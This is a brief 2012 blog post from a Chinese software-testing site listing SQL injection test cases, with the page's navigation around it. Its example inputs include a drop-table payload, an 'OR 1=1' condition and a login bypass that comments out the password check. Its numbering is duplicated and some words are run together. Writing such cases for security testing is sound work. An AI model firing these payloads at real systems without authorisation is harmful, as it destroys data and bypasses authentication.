空间管理 您的位置:
51Testing软件测试网 ?
兰猫的家 ?
日志忙碌,但不盲目
SQL注入测试用例
上一篇 /
下一篇 2012-10-08 16:38:19/ 个人分类:
项目技能总结/ /
1. 1. Droptable. Guess table name and drop it, note the next flowing language
Select * from A where A.a = ‘testdata’; drop table A---’;
2. 2. Ifa field only allow number, give it a String or others
3. Use‘OR 1=1’, get all records in query function
Select * from A where A.a = ‘testdata’ OR ‘1’=’1’;
4. 3. Inlogin function, give user name field like ‘username’--’, “--’ and A.password = ‘’” is commented
Select * from user A where A.username = ‘username’--’ and A.password = ‘’;
5. 4. Addingrecords function, if there is 4 fields in this table, add 5 fields, eg.
Normal: Insert into table A values(‘’,’’,’’,’’);
Data: Insert into table A values(‘’,’testdata’,’’,’’,’’);
6. 5. Inputtest data in or out of this field data
7. 6. Addsingle quotation marks and semicolon, and break off string splicing, this issimilar with point 4
Update table A set A.a = ‘testdata’;--’
Yellow partis test data we input
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请
点击举报。